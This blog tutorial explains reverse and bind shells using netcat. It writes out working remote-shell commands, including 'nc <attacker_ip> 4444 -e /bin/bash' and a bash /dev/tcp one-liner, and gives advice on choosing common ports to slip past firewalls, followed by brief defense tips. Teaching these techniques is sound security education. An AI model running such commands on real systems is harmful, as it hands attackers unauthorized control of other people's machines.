Reverse Shell vs Bind Shell ft. Netcat

Sundaram GSundaram G
4 min read

Analogy:

Imagine you're locked outside your house (the attacker's machine), and the only way in is by having someone inside (the target machine) call you and leave the door open and that’s a reverse shell.

But what if you could just tell the house to open its door and wait for you to enter? That’s a bind shell.


What’s the Goal?

The attacker wants remote command execution to run commands on the target system as if they were sitting at its terminal. Two common ways to do this:

  • Reverse Shell: The target connects back to the attacker.

  • Bind Shell: The target listens on a port; the attacker connects in.


What is Netcat?

netcat (or nc) is a Swiss army knife for TCP/IP it can:

  • Connect to ports

  • Listen on ports

  • Transfer files

  • Act as a simple chat client

  • Create shells!


Reverse Shell

Setup:

  • The attacker sets up a listener on a specific port.

  • The target initiates a connection to the attacker and sends over a shell.

On Attacker Machine:

nc -lvnp 4444

What it means:

  • -l : listen mode

  • -v : verbose (see what's happening)

  • -n : don’t resolve DNS (makes the command run faster)

  • -p 4444 : listen on port 4444

    When the victim runs the command (below), you get their shell in your terminal!

On Target Machine:

nc <attacker_ip> 4444 -e /bin/bash

What it does:

  • nc: runs Netcat

  • <attacker_ip>: IP of the attacker machine

  • 4444: port to connect to

  • -e /bin/bash: executes /bin/bash and sends I/O over the connection🔗 Bind Shell

Note: In many modern systems, netcat is compiled without the -e option for security reasons.

Alternative (On Target):

bash -i >& /dev/tcp/<attacker_ip>/4444 0>&1

Breaking Down the above command:

  • bash -i: starts an interactive shell

  • >& /dev/tcp/...: sends stdout and stderr to the TCP connection

  • 0>&1: connects stdin to stdout (bidirectional shell).

One thing to keep in mind is that the bash -i is executed after all the file descriptors are set.


Bind Shell

Setup:

  • The target sets up a listener on a specific port.

  • The attacker initiates a connection to the target and receives a shell.

On Attacker Machine:

nc <victim_ip> 4444

Attacker connects to the victim’s IP in the specified port.

On Target Machine:

nc -lvnp 4444 -e /bin/bash

Target is saying:
"I'm listening on port 4444. If someone connects, they get my Bash shell."

Note: Use the alternative way if the -e option is blocked.


Defense Tips

  • Monitor outgoing connections to strange IPs.

  • Use firewalls to block unauthorized traffic (both inbound and outbound).

  • Disable nc, bash -e, or socat if not needed.

  • Use EDR tools to detect suspicious shell behavior.


Firewall Considerations: Reverse vs Bind Shell

Let’s talk firewalls - the digital bouncers of the network world.

When you're setting up a reverse shell or a bind shell, firewall behavior plays a huge role in whether your connection will succeed or get silently dropped.

Reverse Shell

You (the attacker) listen, and the victim connects out to you.

  • The victim machine is initiating an outbound connection and outbound traffic is usually allowed by default on most firewalls.

  • So, you should pick commonly allowed ports like:

    • 80 (HTTP)

    • 443 (HTTPS)

    • 53 (DNS)

These ports are less suspicious and more likely to sail past restrictive egress filters.

Why it works:
  • Outbound connections are needed for daily stuff (browsing, updates), so they’re rarely blocked.

  • Firewalls usually don’t mind if a user connects out to the internet but hate when something tries to get in.

Bind Shell

The victim opens a port and waits — and you connect in.

Sounds simple, but...

  • Most systems block incoming traffic unless you explicitly allow it.

  • Victims behind NAT, routers, or corporate firewalls? Yeah! good luck reaching them directly.

  • You could try to be sneaky by binding to 80 or 443, but:

    • You might clash with existing services (like web servers).

    • Ingress filtering still might kill the connection.

Why it usually fails:
  • Inbound traffic is seen as more dangerous.

  • Unless the firewall/NAT is configured to forward your connection, it gets dropped.


Real-World Tip:

When in doubt — go reverse. It’s more reliable, more stealthy, and plays nice with firewalls.

In next article we will use Socat (Superior to netcat) for the same application. Click → [SOCAT SUPREMACY]

0
Subscribe to my newsletter

Read articles from Sundaram G directly inside your inbox. Subscribe to the newsletter, and don't miss out.

Written by

Sundaram G
Sundaram G